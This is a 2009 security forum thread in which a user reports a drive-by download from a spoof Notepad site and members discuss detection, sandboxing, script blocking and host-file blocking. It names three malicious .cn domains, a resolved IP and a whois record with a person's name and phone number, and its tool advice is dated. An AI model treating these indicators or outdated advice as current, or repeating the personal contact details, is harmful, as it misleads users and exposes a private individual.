Hit by 0Day Drive by Download - What to Do?

Discussion in 'malware problems & news' started by 1boss1, Jul 19, 2009.

Thread Status:
Not open for further replies.
  1. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    I know prevention is better than cure, but sometimes things happen. Last night i searched "Notepad" looking at other Notepad++ alternatives and clicked on notepad dot org on the first page and got hit by a drive by download.

    The Javascript called 3 .cn domains, tried to launch .pdf and flash and i (or it) crashed Firefox as i was hitting the Red 'X' in attempt to kill the browser.

    Norton didn't log anything, and i scanned with Malwarebytes and Prevx which come up with nothing. I also manually looked at files in \Content.IE5\ and similar places to look for evidence of downloaded files. I also Googled the .cn domains to see what they done, but one had no search results. Then i ran CCleaner to remove all junk files.

    Because there's so many 0Day, and malware signatures changing by the second so they are not detectable i'm wondering... What steps would you take if you were hit like this?

    How would you go about detecting what was done, and correcting it?
     
  2. Cudni

    Cudni Global Moderator

    Joined:
    May 24, 2009
    Posts:
    6,956
    Location:
    Somethingshire
    You do exactly what you did and check with anything you have. In future, disable scripting for all sites except trusted ones to further remove a chance of drive by download
     
  3. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    17,057
    You also might consider running Sandboxie. Then even if there was something bad, it wouldn't have hurt you.

    Pete
     
  4. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    That's what I was also going to suggest, but from what I see in the user's signature, Sandboxie is being used. So, I guess that's why the system wasn't infected.
     
  5. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    Since you use Sandboxie (according to your signature) I assume that's why you found nothing in your system.

    In future, you may want to prevent that sort of things to happen. As Cudni suggested, disabling javascript will prevent any malicious domain from damaging your system, if it requires javascript to be enabled.

    I go even further. I have a default-deny for javascript, java and plug-ins. I only allow these sort of contents per site, and only those I trust. I, also, only allow what they need. If XYZ site I know needs javascript, then I only allow javascript.

    Bottom line is, if those domains require one of those technologies to attack your system, and if they're denied, then they can't damage your system.
     
  6. Osaban

    Osaban Registered Member

    Joined:
    Apr 11, 2005
    Posts:
    4,222
    Yes Sandboxie probably managed to protect the system, what about Malware Defender, no alerts?
     
  7. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    Excellent thank you, it was bugging me if i could of done anything else to locate/fix whatever happened.

    So i figured it would be good to develop a logical step by step process of things to do, check, scan with etc to best locate any infection and mitigate it as soon as it occurs. People searching Google who have no clue about scripting, sandboxie etc will no doubt find it useful also.

    My mother for instance would panic, and reboot which wouldn't be the best thing to do.

    This system i was using wasn't mine, so no Sandboxie or Malware Defender. It was Vista with UAC enabled, Flash & Pdf was fully updated however Windows had an outstanding critical update for the latest font vulnerability. For some reason Vista didn't warn of any updates, it wasn't until i double checked with Securina PSI this became known.

    I should of mentioned i wasn't on my regular system sorry.

    With zero day exploits, and unknown signatures becoming more common obviously scanning the computer with ABC tool and finding nothing doesn't guarantee much. That's why i was wondering how best to respond to an "unknown" web based exploit.

    I was surprised Norton stayed silent, one of the .cn domains was the Microsoft misspelling that Norton knows about.
     
  8. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    1.
    You could do a simple Windows search for recent *.exe as well.

    2.
    Even if an exe was downloaded the UAC should alert before it was allowed to run.

    3.
    Was firefox configured to download pdf's or open them in the browser ?
    If it was to download the pdf , then no malware download attempt could happen unless the pdf was opened in explorer.

    4.
    If flash was up to date then i think that sounds ok too.


    5.
    Prevx and MBAM are very good scanners , you could try a few other online ones to reasssure yourself , like Kav.
    The NOD32 SysInspector.exe and MS Procmon.exe tools are very powerful.

    I would be pretty confident the system was ok though.
     
    Last edited: Jul 19, 2009
  9. G1111

    G1111 Registered Member

    Joined:
    May 11, 2005
    Posts:
    2,127
    Location:
    USA
    The site appears to be still active today. KAV 2010 blocked some malware from the site.
     
  10. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    If you guys can please provide the site names/ip ranges.

    Thanks
     
  11. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    I make yours my request. It would be interesting to know about the domains.
     
  12. JRViejo

    JRViejo Global Moderator

    Joined:
    Jul 9, 2008
    Posts:
    20,980
    Location:
    U.S.A.
    The site mentioned by 1boss1 would be a good one for Rmus to dissect, but novices be warned, any browser without script protection will trigger the hidden scripts; my Firefox (with NoScript) does not!

    From what I gather, the Description Meta Tag states Notepad parody spoof HTML editor and the links at the bottom of the page, do open your own PC's Notepad, so it seems like a joke, especially when one sees the "Created by Notepad logos" page.

    However, the Page Source reveals 8 scripts inside the body text, 7 of which open iframes to Chinese Web sites, via document.write functions, overwriting the Home page. The eight one is an eval function that seems to be the command execution script. I did not go as far as triggering the scripts, leaving that to Rmus. Hopefully, Rich will see this thread soon.

    @Escalader, according to the scripts, the sites are:

    delzzerro dot cn - No advisories yet!
    updatedate dot cn (used 3 times) - Norton Advisory
    microsotf dot cn (used 3 times) - Google Advisory
     
  13. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    The 3 sites at the end of your post are valid. I have added them to my HOST file as 127.0.0.1 loopbacks so my PC cannot connect to them.

    Now I will try to find the ip ranges for them and post back results for the general good of all. Once I have those ip ranges I can add them to my FW block list.

    More later
     
  14. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    Thanks good tips, i didn't really search for recent exe's i checked around in the regular cache locations for any .swf, .pdf and exe files.

    I thought malware exe's could change their creation/modified date to make it appear the file was years old, is this true? I guess even if it is, i'll add searching for recent exe's system wide on the check list.

    I run a forum of mainly Ebay women who don't know an exe from an ActiveX, so running Sandboxie or Malware Defender is well beyond them but after this recent scare i'm going to put together an easy "checklist" in case any of them get hit. I've already got them running Securina PSI, most of them had Flash/Pdf versions years out of date which is worrying.

    Ok with Firefox, i had the addon "PDF Download" which allows you to choose to either open the document in the browser, or save it. The malware seemed to bypass it, no option came up to choose but a new pdf tab spawned on the taskbar for about a second.

    I didn't mention the malware domains directly, i wasn't sure if i was allowed but yes the ones mentioned were involved. The delzzerro dot cn one had zero Google results when i was hit, so looks like nobody knows about it yet.
     
  15. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    Sorry guys I've been unsuccessful in decoding the ip's for these 3 sites.

    I must need a new decoder!

    Anybody else want to bail me out ?
     
  16. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    Doesn't ping from command prompt give the right IP's?

    Code:
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\Documents and Settings\Troy>ping delzzerro dot cn
    
    Pinging delzzerro dot cn [[B]91.212.198.37[/B]] with 32 bytes of data:
    
    Reply from 91.212.198.37: bytes=32 time=376ms TTL=40
    Reply from 91.212.198.37: bytes=32 time=380ms TTL=40
    Reply from 91.212.198.37: bytes=32 time=376ms TTL=40
    Reply from 91.212.198.37: bytes=32 time=379ms TTL=40
    
    Ping statistics for [B]91.212.198.37[/B]:
        Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 376ms, Maximum = 380ms, Average = 377ms
    
    C:\Documents and Settings\Troy>
    
     
  17. waters

    waters Registered Member

    Joined:
    Nov 8, 2004
    Posts:
    934
    Still live,microsoft security essentials popped up and cleaned
     
  18. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    Yes! I simply suffered a seniors moment:eek: and forgot that! I think I get tooooo caught up in 3rd party SW matters and forget the basics sometimes!

    Thanks again!
     
  19. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    This is what I got for the ip range. Note it is Russia not China 9 (cn)
    What I did was add the full ip range to the OP FW Pro IP Block List as a range. All packets to or from that range are now blocked.

    IP Addresses Report

    Created by using IPNetInfo

    Order 1
    IP Address 91.212.198.37
    Status Succeed
    Country Russian Federation
    Network Name NEVAL
    Owner Name Hosting company LIR.KZ
    From IP 91.212.198.0
    To IP 91.212.198.255
    Allocated Yes
    Contact Name Nevedomskiy Alexey Alexeevich
    Address Russian Federation
    Phone +79024883214
    Whois Source RIPE NCC
    Host Name
    Resolved Name
     
  20. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    I guess they could - that didn't occur to me ! :)

    I personally really like the "default deny" approach.
    I use an app - anti-executable - to do it cause i'm on XP.
    Vista UAC is very similar to this , so if you have Vista UAC active its pretty effective.
     
  21. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    Hehe don't worry i suffer from that also, or "toolitis" where i rely on various tools so much for certain things that i'm lost when they fail.

    I just "assumed" malware could change the creation/modified date because i can do it with a Right Click utility i have which is pretty extensive:

    http://i27.tinypic.com/j0xv84.png

    I don't know a whole lot about the PC side of things with exe's, dll's and malware. I'm a web developer, and with so many sites being hacked, injected and FTP's stolen i decided it was time to understand this malware business. :)

    With my desktop it's XP, and yes i basically use a default deny approach also with Outpost set on "Black Most". I don't use Malware Defender much, i only activate it on demand when i want to see registry changes.

    I was really caught off guard with this drive by, it was on a new Vista laptop that rarely goes on the net so security was very ordinary on it.

    Thanks for the tips everyone.
     
  22. G1111

    G1111 Registered Member

    Joined:
    May 11, 2005
    Posts:
    2,127
    Location:
    USA
    Visited the site today and it was still active. I got this alert from KAV 2010. Turned off KAV and neither Prevx or Malware Defender detected anything. Nothing appeared to be loaded/running from the hacked site. Didn't notice anything in DefenseWall.
     

    Attached Files:

  23. trjam

    trjam Registered Member

    Joined:
    Aug 18, 2006
    Posts:
    9,057
    Location:
    North Carolina
    I just tried and opendns says it is not loading. Weird
     
  24. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    These guys are now exposed by this forum and by Kav so they have probably moved on! BUT I'm guessing so keep shields up!
     
  25. Ilya Rabinovich

    Ilya Rabinovich Developer

    Joined:
    Sep 13, 2005
    Posts:
    1,543
    I can confirm the page is infected with pdf-based exploits. That guys are using "do not allow double visits" trick.
     
Loading...
Thread Status:
Not open for further replies.